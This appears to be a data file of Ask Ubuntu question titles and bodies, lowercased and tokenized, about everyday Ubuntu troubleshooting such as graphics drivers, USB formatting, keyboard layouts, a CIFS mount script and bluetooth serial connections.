466603	network interface bonding via preseed script	is there any possibility to use a preseed-script to configure a bonding network interface ? or maybe some other way of automatically configure bonding interfaces if they are available in the same network ? thank you .
466605	can not open output file : permission denied	so i 'm completely new to ubuntu . i 've set up a shared folder with a few c programs and when i go to compile in ubuntu , such as : gcc file.c -o filetest i get the following error : /usr/bin/ld : can not open output file filetest : permission denied collect2 : error : ld returned 1 exit status i 'm sure that my permissions for the c files are correct , all files have 'rwx ' permissions . do i have to change the permission of the directory as well ? i 'm a complete newb , so apologies .
466606	huawei k4203 hspa+ dongle install help	i have ubuntu 12.10 have huawei k4203 usb broadband dongle and although there are instructions for linux , they do n't work . here are the instructions : ( 1 ) insert stick ( 2 ) dismiss all popups about running the auto install scripts ( they ca n't work ) ( 3 ) open terminal ( 4 ) cd $ home ( 5 ) mkdir vmb ( 6 ) cd vmb ( 7 ) ( cd `` /media/quickstart â ? .0 & & tar -cf - . ) | tar -xf - ( 8 ) chmod +x autorun.sh install_linux ( 9 ) sudo ./autorun.sh ( 10 ) type user password ( 11 ) wait for last command to finish , then close terminal all steps up to step 6 seam like something is happening , but after entering line 7 the terminal changes to a `` > '' and then i copy/paste steps 8,9 and enter 10 , but nothing happens . how to solve this ?
466610	corrupted window control theme on unity	i have a question related to themes in ubuntu 14.04 . whenever i try to apply a few themes such as adwaita or zukitwo , the window controls are not accurately themed and look out of place . i have added a couple of screenshots , one is with adwaita and the other with zukitwo . i observe this behavior only with unity , the themes work fine with other desktop environments such as gnome shell and cinnamon . i have tried resetting gnome and unity settings , but that does n't help . any suggestions would be appreciated .
466612	transmission 'save to location ' error for nas	my nas 3tb hard drive either goes into sleep mode , or is n't available because i am travelling away from home . when this happens , and transmission is open , it will run an error on the 'save to location ' . if it errors , the file is remains in the default download location because the 'save to location ' is n't available . when i am back on the home network , the save to location wo n't correct itself back to the nas . it just stays as 'error ' like it forgets what my originally specified 'save to location ' was/ does anyone know how to persist the 'save to location ' and then , if it is not available at the time of saving , to just 'not save and keep it where it is ' or try a second location that is using the laptops mounted internal storage ?
466614	serial redirect from 12.04 server usb installer	i have downloaded 12.04.4 lts server iso ( 64 bit ) and used netbootin to create a bootable usb thumb drive for the purpose of installing ubuntu server on a dell r620 . i have serial console connected and working for the host ( i can see bios post , etc ) . i can boot from the usb thumb drive and get to the unetbootin menu where i select install ubuntu server . once i select that option ( or any of the others - expert install etc ) , i do n't see any output on my remote console connection . i do however see output on my direct connected monitor/keyboard ( crash cart ) . it is my assumption that the serial redirect setup is not done on the files on the thumb drive version of os . my ultimate goal is to be able to get hw to a datacenter , have it racked and cabled , have serial connection setup , have one of these usb thumb drives attached and from there i can do the install etc . this is sort of a one off and i do n't want to install via our usual pxe/kickstart method . can someone point me to a guide to `` unpack '' the iso files , add the serial redirection bits i need and then `` repack '' into an iso so i can then burn the iso to the thumb drive ( using unetbootin ) ? or is there a different/better way ?
466619	how to authenticate a startup disk image ?	the process of creating a startup disk on ubuntu looks really vulny to me . it 's scary in a number of ways . please either ( 1 ) refute my assertions with contrary evidence or ( 2 ) tell me how to avoid these pitfalls ( hopefully without giving up on ubuntu as a quasisecure os ) . first of all , here 's what i tried to do : write an ubuntu iso ( hash authenticated ) through pen drive linux on windows , to a usb stick , resulting in a bootable image . install the resulting boot image on computer a . write the same iso to another usb stick on another machine using startup disk creator from within an existing different ubuntu context . install the resulting boot image on computer b . use startup disk creator on computer a to make a new bootable usb stick using the original iso above , resulting in image a . use startup disk creator on computer b to make a new bootable usb stick using the same iso , resulting in image b . compare image a and image b . in other words , if i start with 2 different ways of creating a boot image , do their children boot images then match up , if in fact i use only startup disk creator and not pen drive linux on the second round ? here 's what i learned , in no particular order : startup disk creator has an `` erase disk '' button , but it does n't seem to work because it seems to preserve the file system type . is it really erasing the boot sector ( not to mention the partition table ) , or just leaving the latest boot virus there , ready to infect the newly minted startup disk when it 's used for installation ? yeah , we can use the disk utility to format media , but it would be nice if startup disk creator told me that it was n't actually initializing anything in a manner suitable for secure boot . ( efi boot might partially mitigate this threat , but probably would n't eliminate it . ) we have various pages on ubuntu.com which provide various hashes for the iso . but this irrelevant , because ultimately , we all want an authenticated boot image , not an authenticated compressed file which eventually evolves into the aforesaid boot image ( after passing through an infected machine etc . etc. ) . we have md5sum.txt in the boot image . md5 has been deprecated for years as a secure hash . not to mention that a virus could easily modify this file , so it ca n't replace the necessity for file hashes which are downloadable from https : //ubuntu.com/i-dont-know-where , not unlike http ( not s ! ) : //releases.ubuntu.com/14.04/sha256sums . yeah sure , it 's great for protecting against accidental errors , but that does n't address security . ldlinux.sys is not even mentioned in md5sum.txt . it 's the only file which differs between image a and image b ( again , even though everything came from the same iso ) . i do n't even have a checksum for this file , let alone a secure hash . for all i know , computer a and computer b are both infected , but with different viruses that infect this file differently . here 's what i want to know how to do : a way to authenticate the child image ( online , not via local means that might have become infected ) . some sort of standard that ensures that startup disk creator and pen drive linux and whatever random boot maker can adhere to , so that anyone can easily inspect the resulting startup disk and say `` this was signed by ubuntu '' or at least `` these hashes look the same as the ones i see on https : //ubuntu.com/hashes '' . if nothing else , then the sha256 and correct size of ldlinux.sys for various unbuntu versions . yeah i can compile it all myself , but there 's no reason to believe that viruses would not infect source code as well as binary code . same authentication problem .
466621	mouse flicker on triple monitor setup ubuntu 14.04	i am currently running ubuntu 14.04 with kernel version 3.13 . i have two ati hd4650 graphics cards and am attempting to push display on 3 monitors . the first card is attached to 2 monitors via an hdmi and dvi connection . the second card is attached to 1 monitor via an hdmi connection . everything works perfectly except for the mouse flicker i am having . this mouse flicker only occurs when i have the display attached to the second card enabled . when the mouse is inside the second card 's display ( left-most monitor ) the mouse is steady . however , when the mouse moves into either of the 2 displays on the right , the mouse starts doing a random flicker . i do not have any proprietary drivers installed at this time . the 4000 series cards are now only supported by a legacy amd driver which only works up to kernel version 3.4 . i am aware of a unofficial legacy driver but i have not had time to mess with it yet . any ideas to eliminate this mouse flickering would be appreciated !
466622	geforce 7800 gt nouveau drivers ?	after wasting a lot of time trying to get radeon hd2600 to work i gave up and got my hands on two geforce 7800gt . so far trying to get things going with one gpu at a time , out of box livecd 14.04 would n't even boot , screen would freeze . after lot of research and trying few different things setting nomodeset in grub did the trick . finally got a desktop but both monitors are in clone mode and it does n't look like the second monitor is even recognized . i was hoping not to go with binary nvidia but looks like i might have to go that route . if i went with windows everything would be up and running a week ago , and here i 'm fighting just to boot things up out of box on 5yr old gpus $ lspci | grep vga 01:00.0 vga compatible controller : nvidia corporation g70 [ geforce 7800 gt ] ( rev a1 ) $ sudo lshw -c video *-display unclaimed description : vga compatible controller product : g70 [ geforce 7800 gt ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list configuration : latency=0 resources : memory : fd000000-fdffffff memory : d0000000-dfffffff memory : fc000000-fcffffff ioport : bc00 ( size=128 ) memory : fe7e0000-fe7fffff $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 1280 x 1024 , maximum 1280 x 1024 default connected primary 1280x1024+0+0 0mm x 0mm 1280x1024 0.0* 1024x768 0.0 800x600 0.0 640x480 0.0 $ grep ee /var/log/xorg.1.log ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 484.141 ] ( ee ) open /dev/dri/card0 : no such file or directory [ 484.141 ] ( ee ) open /dev/dri/card0 : no such file or directory [ 484.141 ] ( ee ) [ 484.141 ] ( ee ) backtrace : [ 484.141 ] ( ee ) 0 : x ( xorg_backtrace+0x48 ) [ 0x7f8d03923c78 ] [ 484.141 ] ( ee ) 1 : x ( 0x7f8d0377b000+0x1ac969 ) [ 0x7f8d03927969 ] [ 484.141 ] ( ee ) 2 : /lib/x86_64-linux-gnu/libpthread.so.0 ( 0x7f8d02878000+0x10340 ) [ 0x7f8d02888340 ] [ 484.141 ] ( ee ) [ 484.141 ] ( ee ) segmentation fault at address 0x0 [ 484.141 ] ( ee ) [ 484.141 ] ( ee ) caught signal 11 ( segmentation fault ) . server aborting [ 484.141 ] ( ee ) [ 484.141 ] ( ee ) [ 484.141 ] ( ee ) please also check the log file at `` /var/log/xorg.1.log '' for additional information . [ 484.141 ] ( ee )
466629	how to factory reset a usb ?	how do you factory reset a usb ? i have a hp 4gb usb that seems like it has a messed up partition table and ubuntu is n't recognizing all the space . i 've tried formatting it in disks . that does n't work . how do you make a usb good as new on ubuntu ? i formatted it in the default way - fat . originally what happened was that i did sudo dd if=memtest86-usb.img of=/dev/sdb to install memtest86 on the usb . when i was done with that i formatted it in the default way but ubuntu kept calling it the 51mb volume in nautilus . i formatted it and tried to use it with winusb . winusb gave me an error . installation failed ! exit code : 256 log : formating device ... error : the backup gpt table is not at the end of the disk , as it should be . this might mean that another operating system believes the disk is smaller . fix , by moving the backup to the end ( and removing the old backup ) ? warning : not all of the space available to /dev/sdb appears to be used , you can fix the gpt to use all of the space ( an extra 7655424 blocks ) or continue with the current setting ? error : you requested a partition from 1000kb to 4077mb . the closest location we can manage is 17.4kb to 157mb . then i tried following the advice on the first answer on this page . i 'm trying to now use the usb with winusb and winusb just keeps trying to format it . output of sudo parted -l : model : ata toshiba mk5076gs ( scsi ) disk /dev/sda : 500gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 496gb 496gb primary ext4 boot 2 496gb 500gb 3868mb extended 5 496gb 500gb 3868mb logical model : usb disk 2.0 ( scsi ) disk /dev/sdb : 4077mb sector size ( logical/physical ) : 512b/512b partition table : loop number start end size file system flags 1 0.00b 4077mb 4077mb fat32 model : linux device-mapper ( crypt ) ( dm ) disk /dev/mapper/cryptswap1 : 3868mb sector size ( logical/physical ) : 512b/512b partition table : loop number start end size file system flags 1 0.00b 3868mb 3868mb linux-swap ( v1 ) default way : ubuntu 14.04 program `` disks '' - format - ( quick ) ( fat ) winusb is a linux program for making a windows install disk .
466634	simplescan failing with epson workforce wf-5320	simplescan used to work for me , and now i 'm still able to print , but mysteriously i have lost my scanning capability . when i try to scan with simplescan , i just get the error `` failed to scan '' and `` no scanners available . please connect to a scanner . '' the scanner still works with my other computers . where should i begin to diagnose this ?
466637	is stopping freezed ubuntu at hp compaq pc by pressing shortly the computer reset button ok ?	if my ubuntu 12.04 installed on the hp compact pc freezes , i simply press shortly the reset button on the computer case as i am used to do in windows . the ubuntu 'shut down ' dialog appears and works as if i have clicked the system display 'shut down ' button . ( probably it is set in bios setup . ) is this technique ok ?
466646	how to get the `` name '' of the key combination ( keybind key ) for the openbox config file	it is one more attempt to get fn keys to volume up/down , brightness , etc . working . those controls are simply not working in my non-branded ultrabook . in the configuration file : /home/yourname/.config/openbox/lubuntu-rc.xml we can find the following code : < ! -- keybinding for volume management -- > < keybind key= '' xf86audioraisevolume '' > < action name= '' execute '' > < command > amixer -q sset master 3 % + unmute < /command > < /action > < /keybind > so i guess if we find the correct keybind key , it will work . am i right ? if so , how ? note : i 'm using the default keyboard , pc105 note 2 : in this answer , for the xf86 keyboard , the format of the keys seems something like 0x1008ff12 ( code for mute in that keyboard ) . according with that answer , the keybind key is a shortcut to a file where that code is . note 3 : in this forum , there is an attempt to do it with xbindkeys . unfortunately , xbindkeys does n't seem to capture the fn key for me . note 4 : after modifing the configuration file , we have to run openbox -- reconfigure
466650	using the evolution with an external editor ?	i seek for using libreoffice writer or a similar tool as a mail composer and reader in the evolution . in windows outlook i have used microsoft word directly for writing mails . evolution default mail editor does not enable easy and precise html formatting ( see comments ) . one month without answer shows that there is probably no possibility how to configure my present evolution version ( 3.2.3 ) in ubuntu 12.04 to use the libreoffice writer for writing mails and the same writer or gedit for writing calendar appointment descriptions . i think that many people need it ; maybe somebody has so adapted the evolution source code for his purpose ; it would be far more than worth of a bounty of all my reputation . or , more attention to it will motivate the developers to adapt it in near future . ( i am trying to return to my original question meaning . )
466651	how do i use the latest gcc 4.9 on ubuntu 14.04	i want to compile my program with the latest version of gcc . ubuntu 14.04 comes with gcc 4.8.2 , however there 's 4.9.0 available , moreover , i see that it is available as a package : gcc-4.9 . i tried to install it sudo apt-get install gcc-4.9 but it says reading package lists ... done building dependency tree reading state information ... done note , selecting 'gcc-4.9-base ' for regex 'gcc-4.9' gcc-4.9-base is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . looks like it is already installed , just not as the default one ? how do i utilize it to build my program ?
466655	how do i change the locale of wine to japanese on ubuntu 14.04 ?	i wish to run a game called `` morenatsu '' on ubuntu 14.04 via wine . morenatsu requires applocale in windows . can i run morenatsu in applocale in wine ?
466657	how to turn off the touchpad so it stays off !	ver 14.04 in system settings - > mouse & touchpad , i set `` touchpad '' to off . this works fine until i reboot the computer ... . then the `` touchpad '' is back on . is it possible to turn it off and have it stay off ? ?
466658	how can i limit the bandwidth usage of the copy process ?	i am running copy and it is uploading like crazy . our isp is crappy , so whenever copy is uploading , i have to stop the process and then cont it using kde 's system monitor to prevent it from hogging bandwidth . is there any way to limit the bandwidth that it uses , either with a gui app or from the terminal ?
466661	invisible mouse cursor plus disabled internet connection on 13.10	i am totally new regarding ubuntu , recently converted from windows . a friend installed ubuntu 13.10 on my laptop a few months ago . it 's been working great up until about thirty minutes ago . i booted up the system tonight after having shut it down this morning before work . upon startup my mouse/cursor is missing , my internet connection is disabled ( despite the wireless adapter being switched on and the internet connection working fine on other devices in the house ) . i am able to use the keyboard and access the terminal , but i do n't know the first thing about fixing this issue . i tried searching the ubuntu forums and ask ubuntu , but i do n't see any issues that mimic mine . i also , unfortunately , am unable to offer any sort of system data because i ca n't access the internet or use the mouse on my laptop to even obtain such data . i really need help . i ca n't even begin to speculate how this happened considering everything was working fine at 8 a.m. this morning .
466662	how to disable password prompt for switch users ?	in 14.04 , how can i switch between users on the console without entering a password ? this has been asked by others many times over the years ( such as here ) , and it seems it always gets redirected to something else that 's close but not the same . so , i 'll try to be exact in the use case below , to avoid any misunderstandings of the goal . sorry for the length . the sole reason for switching between users is so family members at our home can have their own browser favorites/history , their own unity session prefs ( i use dvorak and swap esc/capslck ) , etc . we use a bios password to prevent routine machine access ; security amongst ourselves is not a concern . we do n't use any drive or mount point encryption , so i 've no illusions of protection after physical theft . i do want a password on my account , so i can authenticate for system updates , authenticate with sudo for various activities , scp between various machines , etc . i would prefer to be prompted for a password if i 'm not already logged into the console , but not again when just switching from other users . if i 'd ever feel the need for a session lock , i could live with just logging out instead , though it 's not preferable . an ubuntuforums hack for 12.04 of uninstalling gnome-screensaver worked well for that old release , but does n't work under 14.04 . setting disable-lock-screen ( per a couple ways here ) also does n't work . settings|brightness|lock=off does n't help because this is important for us , i 'm willing to try other flavors ( lubuntu , xubuntu ) or even other distros to get this functionality , but prefer unity from the main ubuntu distro . following the idea here , i 'm currently test driving password-less standard accounts , and using password-protected administrator account ( not root ) for software updates , scp commands , etc . this mostly accomplishes the goal , and ( since i 'm old-school ) it feels right to use a dedicated admin acct for admin-ish things , but i 'd still like the option to lock my session . ( if this is a missing feature , i 'm thinking launchpad is the best avenue for submitting a feature request ; correct me if i 'm wrong . )
466668	internet-based programs are unstable and slow	i 'm on ubuntu 14.04 . there is something conflicting with my internet access i think . after installing git and sublime i 've been developing , but sometimes ( not rarely ) i ca n't add a new package to sublime . meanwhile if i try to push something into github from the terminal i ca n't do this either , and this also happens with firefox , they think i 'm disconnected , but suddenly , everything works fine . i have this new ubuntu 14.04 installed in three pcs right now , but only one of them is totally stable in this regard . have any of you had this problem or know how to solve it ? thanks in advance ! : ] edit : chrome and streaming works fine , it 's not my internet connection .
466669	two seperate screens with nvidia drivers	i got the two displays to work fine on nvidia binary ( i 'm guessing twinview ? ) , but when i set them to different screen ( monitor0 to be on screen0 and monitor1 on screen1 ) it loads , i get the background but there is no panel so i ca n't start anything and the cursor looks like an x *-display description : vga compatible controller product : g70 [ geforce 7800 gt ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:16 memory : fd000000-fdffffff memory : d0000000-dfffffff memory : fc000000-fcffffff ioport : bc00 ( size=128 ) memory : fe7e0000-fe7fffff
466680	dell wifi is installed but not working ubuntu 14.04	before i installed the ubuntu i ran trying mode and installed the driver by additional driver . it was working , but but after the installation it is not working any more . this is the output of lspci -nn | grep 0280 : 07:00.0 network controller [ 0280 ] : broadcom corporation bcm43142 802.11b/g/n [ 14e4:4365 ] ( rev 01 ) output of iwconfig : eth0 no wireless extensions . lo no wireless extensions . output of rfkill list all : 1 : hci0 : bluetooth soft blocked : no hard blocked : no
466684	how to deploy my qt app statically on ubuntu ? it is running on ubuntu 14.04 only	i wrote a application with qt 5.x and the compiled binary is only working on my development machine running 14.04 on other machines running 14.04 on linux mint 16 i already inserted the config += static in my pro file . but when i do ldd ./my_executable it shows a long list of dependent libs from my system .
466685	can ubuntu open and run microsoft word files ?	looking at converting from windows xp to ubuntu . need to know if ubuntu can open and update microsoft word files .
466686	ubuntu 14.04 go to switch account without goint through lock account	okay . so the new ubuntu 14.04 decided that user needs to lock their account first then , switch account . so my question is how can i go straight to switch account screen without going through the lock screen . i feel this part is backward and really annoying , especially on a shared computer .
466688	what 's the difference between the tty and the gnome terminal ?	i know that terminal can be started by ctrl+alt+t . but sometime users say about command-line with ctrl+alt+f2 . so , is there any difference in working between them ? and when should i use between them ? what is called tty ?
466689	dell xps 13 touchscreen not working , sound not working	all of a sudden the touchscreen on my laptop stopped working , and the sound does not recognise my headphones . i have not installed anything recently , just the usual , minor lts updates . the touchscreen is apparently not recognised : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=11 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ integrated_webcam_hd id=9 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=10 [ slave keyboard ( 3 ) ] ↳ dell wmi hotkeys id=12 [ slave keyboard ( 3 ) ] and my sound often freezes up now , it does n't recognize my headphones when i plug them in and when using a bluetooth headset , the output is very noisy and muffled . i would prefer not to do a re-install because my laptop ( dell xps 13 ) took me almost a week to get working due to drivers not working , and with exams coming up i do n't have time/patience to redo everything : / thanks , max
466697	protecting other partitions from ubuntu	i want to protect from inside ubuntu the other partitions i have on my pc . where protects means not to be able to access them from inside the ubuntu os and only from inside that os . protecting by password or even remove them as device from this os . anyone knows how to achieve that ?
466699	can homebank 4.5.6 be used to supersede 4.5.5 in the ubuntu repository please ?	i do n't know which version i used to use successfully , but i used to import qif files from my bank into homebank . my computer was out of action for a couple of months , and when i got it working again i attempted to continue importing qif files into homebank again ( version 4.5.5 now ) . it did n't work , i reported a bug , i have been informed that the bug has been fixed in the next version ( 4.5.6 ) of the application on or around 16 february 2014 . i ca n't use the application if it ca n't import these files , and now it has been 3 months since it was apparently fixed .
466707	why is the minimum video memory for a virtualbox machine so large ?	i 'm creating many virtualbox systems with clean installs and such and noticed that the default video memory size is quite large . i could understand at the beginning of the ubuntu installation a vga screen is used . i 'm not too sure of the dimensions and color depth used , but i would imagine that 's quite small . ( 0.5mb ? ) then i end up using those systems in plain console mode . what would be the minimum required to run that ? ca n't i just put 1mb and be good with it and save some memory when running those vitualbox systems ?
466708	computer boots directly into grub , without menu	i turn computer on , i see the acer splash screen for around half a second , and it goes to the grub `` command input screen '' . when i type `` root '' i get the message `` command root not found '' ( or something along those lines ) . i put the ubuntu 14 iso on a usb drive , if that helps . ( it does n't ) ubuntu is my only os .
466711	is there any difference between run command in terminal & alt+f2	for running direct command , there is two way . either run in terminal or run with ctrl+alt+f2 then , is there any difference between them ? ( working same & shell ) or redirects to same ?
466717	can you use gnome keyring in bash script , if yes then how ?	i am developing a automated mounting script for windows shares . i have finished the script and it works just fine , but is it possible to add gnome keyring to the bash so once user writes hes/hers password then it will be saved to gnome keyring and later will be taken from there . also my windows ad users passwords have to be changed each month and is it possible to make the script so once a month has passed then the script asks for password again ? example : user logs in to ubuntu and the mount script starts at login . user writes hes/hers password and the script sends it to gnome keyring to be saved . next time he/she will login then password will be taken from gnome keyring , but if its 1st of june for example the user has to write the password again . code : # ! /bin/bash mountdir=public dirname=shares domain=ad_domain server=server.local.lan share=shared_folder # create mountpoint for mounting if [ ! -d $ { home } / $ { dirname } ] ; then mkdir $ { home } / $ { dirname } fi # define a function that launched the zenity username dialog get_username ( ) { zenity -- entry -- width=300 -- title= '' mount $ mountdir '' -- text= '' username : '' } # define a function that launched the zenity password dialog get_password ( ) { zenity -- entry -- width=300 -- title= '' mount $ mountdir '' -- text= '' password : '' -- hide-text } # attempt to get the username and exit if cancel was pressed . wusername= $ ( get_username ) || exit # if the username is empty or matches only whitespace . while [ `` $ ( expr match `` $ wusername '' ' . ' ) '' -lt `` 1 '' ] ; do zenity -- error -- title= '' error in username ! '' -- text= '' please check your username ! username field can not be empty ! '' || exit wusername= $ ( get_username ) || exit done # if the password is empty or matches only whitespace . wpassword= $ ( get_password ) || exit while [ `` $ ( expr match `` $ wpassword '' ' . ' ) '' -lt `` 1 '' ] ; do zenity -- error -- title= '' error in password ! '' -- text= '' please check your password ! password field can not be empty ! '' || exit wpassword= $ ( get_password ) || exit done # mount windows share to mountpoint sudo mount -t cifs // $ server/ $ share $ { home } / $ { dirname } -o username= $ { wusername } , password= $ { wpassword } , domain= $ { domain } # show if mounting was ok or failed if [ $ ? -eq 0 ] ; then zenity -- info -- title= '' mounting public share succeeded ! '' -- text= '' location documents/shares/public ! '' else zenity -- error -- title= '' mounting public did not succed ! '' -- text= '' please contact system administrator ! '' fi
466718	automatically switch to newly-connected devices	i am using pulseaudio , i want to switch the logitech mic and bluetooth devices to each other when one of these are connected . i am getting the command for that : load-module module-switch-on-connect but if after this command the newly connected devices is not switches then we have to restart the pulseaudio . but i wanted to switch newly connected device without restarting the pulseaudio .
466719	is the maintenance shell password different than the root password ?	i always thought that both the root password and the maintenance password were the same , but apparently this is not the case on my dev / test machine ? i ca n't understand what the maintenance one is , when i did setup and how i can change . all the articles i found so far are to reset the root one . any help ?
466720	system settings icons missing in 14.04	i did a fresh install of trusty 14.04 , but a lot of icons are missing . i installed from dvd which was painfully slow and i hope to avoid repeating the process , especially since i started customizing stuff . here 's my settings window : i 've tried : sudo apt-get install -- reinstall gnome-control-center sudo apt-get install -- reinstall gnome-settings-daemon-schemas none of which changed anything . any idea ? i wan na edit preferences and none of them are in system settings , neither in unity dash .
466722	how to cherry pick a package dependency when there are several providers	i 'm currently writing puppet config to automatically setup a number of system configurations , such as apache2 + php5 + mysql , nginx + php5 + mysql ( in reality any http service a long with any addons and databases ) . many packages , such as wordpress , drupal , php5-fpm and more depends on libapache2-mod-php5 which in turn depends on apache2 , apache2-common . in the non apache2 configurations ( where nginx or similar services are used ) this causes problems such as unnecessary installed packages , apache2 binds to the same port etc .. is there a way to specifically block packages , change priority of such or perhaps prefer other dependencies which may have lower prio ? what approach can the problem be solved with ?
466724	how to connect bluetooth device running serial port profile ( spp from command line	i have the device with blue-tooth on the board . the firmware in the device runs serial port profile ( spp ) stack on it . it works well when i connect to this device from my laptop by means of blueman applet . this applet involves asking me : pincode , pairing my laptop and device , creating /dev/rfcommx device file , which i use to trnasmit with the device . so , it works well , but i need to be able to organize this connection from command line . i 've read different forums , but could not get nor my understanding neither working recipe . i need the description how to do this . could you please write here your advices ? also , this blueman applet crashes my ubuntu 13.04 at dell latitude e6430 from time to time ( when i click to connect serial port in there ) . this is a screen of blueman applet , just in case i believe the command line solution i need should at least do this : 1 . ask to input a pincode to pair with device . 2 . create /dev/rfcommx device file
467733	keyboard keeps defaulting to wrong layout	each time i re-boot the keyboard re-sets so that the keys for @ and `` are reversed ; # appears where the uk pound symbol should be , etc . i have tried lots of fixes posted here and on other forums , and most of them work temporarily , but not after a re-boot . it would help me , and doubtless many other users in future , if someone could post a step-by-step guide to diagnosing and solving teh problem . i 'm running ubuntu 14.04 with a full-size dell uk keyboard ; let me know what system info you need . thanks in advance .
467735	ubuntu shows only one core with nolapic booting option	the only way i can boot my ubuntu ( 13.10 ) on my imac properly is with 'nolapic ' option . however , as far as i know , this option disables all the cores but one . i wonder , is there any way for me to boot and use all four cores my machine has . in other words , is there any booting option that provides similar features to 'nolapic ' one , but does not disable other cores . p.s . : i know , the question sounds like a newbie one , but please , answer if you can !
467738	[ left alt ] +tab does n't work or how to change a level3 shift to a normal alt ?	i have a problem with my ubuntu , running 14.04 lts . the problem is that i 'm trying to user alt+f4 and alt+tab and it does n't work , it only works with the right alt . i also tried to set a new keyboard short-cut for alt+f4 and alt+tab but as soon as i press alt the short-cut is set . the thing i noticed once i set the shortcut is that the key did n't correspond with alt , it was a level3 shift . i search all over the internet of a method to change that level3 shift to the normal alt but only found solution to do the opposite . any suggestions ?
467740	`` sis630 compatible bus not detected '' while installing	i 'm installing ubuntu 12.04 , i got sis630_smbus sis630 compatible bus not detected , module not inserted . then the screen goes black , then goes gray with a mouse active . then back to setup menu : stopping cold plug device stopping log initial device starting mount network filesystem service starting load fallback graphics devices stopping mount network filesystemse encrypted block devices starting enable remaining boot-time encrypted block devices starting configure network device security starting configure virtual network device stopping configure virtual network device the screen freeze in that message and a black screen . an old cpu , migrating from windows xp professional . i 've seen other prblem like this when i search on google , but there 's no matching problem with this . anyone knows what is the problem or how to solve it ? thank you .
467742	how can i install the intel hd4600 graphics driver on 13.10 ?	i downloaded intel ( r ) graphics installer 1 . 0 . 4 for linux* from here : https : //01.org/linuxgraphics/downloads , when i open the application and i press `` begin '' i get this error message . im running a very low resolution like 1280x720 and my gpu supports a lot more i tried everything and the best i have was this : traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/aptdaemon/worker.py '' , line 278 , in _process_transaction lock.wait_for_lock ( trans ) file `` /usr/lib/python3/dist-packages/aptdaemon/lock.py '' , line 176 , in wait_for_lock acquire ( ) file `` /usr/lib/python3/dist-packages/aptdaemon/lock.py '' , line 136 , in acquire lock.acquire ( ) file `` /usr/lib/python3/dist-packages/aptdaemon/lock.py '' , line 72 , in acquire fd_lock = apt_pkg.get_lock ( self.path ) systemerror : e : problem closing the file /tmp/intel-linux-graphics-installer_1.0.5-0intel1_amd64-1.deb - close ( 9 : bad file descriptor )
467743	how do i install nvidia graphics drivers from `` x-swat '' ppa ?	how am i supposed to install nvidia drivers from x-swat ? i try sudo add-apt-repository ppa : ubuntu-x-swat/x-updates -y sudo apt-get update sudo apt-get install nvidia-graphics-drivers-304 and i get e : unable to locate package nvidia-graphics-drivers-304 the launchpad page says there is nvidia-graphics-drivers-304 for trusty , why would n't it install ?
467747	which is better printf or echo ?	for displaying message and print data there are two command available printf and echo . then how differently they used ? which is more preferable ?
467749	how to use soundcloud in tor-browser ? it need flash-player !	i am in iran and have to use tor-browser in my ubuntu 14.04 . but it has a problem with flash-player in `` soundcloud '' . i installed many flash-player add-ons on it . but it not helped me and site say to me that need flash-player to play musics . thanks .
467752	how do i install nvidia graphics drivers from âx-swatâ ppa ?	how am i supposed to install nvidia drivers from xorg-edgers ? i try sudo add-apt-repository ppa : xorg-edgers/ppa -y sudo apt-get update sudo apt-get install nvidia-graphics-drivers-331 and i get e : unable to locate package nvidia-graphics-drivers-331 the launchpad page says there is nvidia-graphics-drivers-331 for trusty , why would n't it install ?
467753	how can i get ubuntu 14.04 back to pure unity ?	i installed kubuntu-desktop and that ca n't be removed , since it is a metapackage . all of the commands i have seen do not work , including ones that use aptitude and ones that simply state the packages to be removed via apt-get . how can i make my kubuntu-desktop be completely removed in the latest version ubuntu 14.04 ?
467755	configure remote server 's apache and php to locate a website	i need to locate website files to remote machine which runs centos with no graphical user interface . my machine runs ubuntu . is there a way to check configuration of installed apache and php or how to configure them in order to run my site ? i have been told that centos uses almost the same commands with ubuntu as it is considered one of linux based system . i had already copied all my website files to remote machine 's /var/www/html directory . i have tried following : open browse from my local machine and try to open that remote addres/website/directory/ error : requested url could n't be retrieved . chmod 777 -r /path/to/website/dir/ but no use . website is not working , so i think i have to configure apache and php together .
467758	can not install ubuntu iso file through usb stick	i recently tried downloaded iso file of ubuntu to burn into usb flash drive , using wubi and power iso tools but when system reboots for installation , it throws error namely kernel panic - not syncing : vfs : unable mount root fs on unknown block ( 1,0 ) please help me with this
467761	qbittorrent v 3.1.9.2 - ca n't select individual torrent	ca n't select individual torrent . have to select all ( ctrl-a ) torrents in each group e.g . all completed then apply certain action e.g . delete . in additional , the description ( e.g . seeder ) of each columns are missing . already try , uninstall and re-install but it wo n't work .
467762	is irssi capable of handling file transfers ?	title pretty much says it all . i 'm learning irssi so i can also learn how to handle screen better . the only feature i 've found so far that irssi ca n't seem to do , is handle any sort of file transfer . i read through the documentation , but i must be missing something .
